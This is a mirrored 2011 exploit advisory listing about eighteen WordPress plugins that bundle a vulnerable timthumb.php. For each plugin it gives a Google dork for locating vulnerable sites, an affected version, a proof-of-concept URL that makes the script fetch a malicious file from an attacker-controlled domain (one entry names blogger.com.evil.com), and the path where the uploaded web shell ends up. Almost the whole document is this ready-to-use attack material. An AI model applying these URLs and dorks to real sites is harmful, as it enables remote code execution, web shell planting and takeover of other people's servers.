扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 |
# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) --- Description --- The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver. Reference: http://www.exploit-db.com/exploits/17602/ # Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-grid-view-gallery # Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/ # Version: 0.1.1 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php # Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/auto-attachments # Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/ # Version: 0.2.9 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php # Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/wp-marketplace # Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/ # Version: 1.1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php # Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/dp-thumbnail # Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php # Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/vk-gallery # Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/ # Version: 1.1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php # Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rekt-slideshow # Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/ # Version: 1.0.5 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL Must first base64 encode the URL. The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php # Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cac-featured-content # Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/ # Version: 0.8 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php # Plugin: Rent A Car WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rent-a-car # Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php # Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/lisl-last-image-slider # Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php # Plugin: Islidex WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/islidex # Software Link: http://wordpress.org/extend/plugins/islidex/download/ # Version: 2.7 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php # Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/kino-gallery # Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/ # Version: 1.0 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php # Plugin: Cms Pack WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cms-pack # Software Link: http://wordpress.org/extend/plugins/cms-pack/download/ # Version: 1.3 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php # Plugin: A Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/a-gallery # Software Link: http://wordpress.org/extend/plugins/a-gallery/download/ # Version: 0.9 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php # Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-list-portfolio-page # Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/ # Version: 0.9 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php # Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/really-easy-slider # Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/ # Version: 0.1 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php # Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/verve-meta-boxes # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/ # Version: 1.2.8 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php # Plugin: User Avatar WordPress plugin shell upload vulnerability # Google Dork: inurl:wp-content/plugins/user-avatar # Software Link: http://wordpress.org/extend/plugins/user-avatar/download/ # Version: 1.3.7 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php Requires register_globals to be enabled and at least one user account to have an avatar directory. The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php # Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/extend-wordpress # Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/ # Version: 1.3.7 --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php |
体验盒子
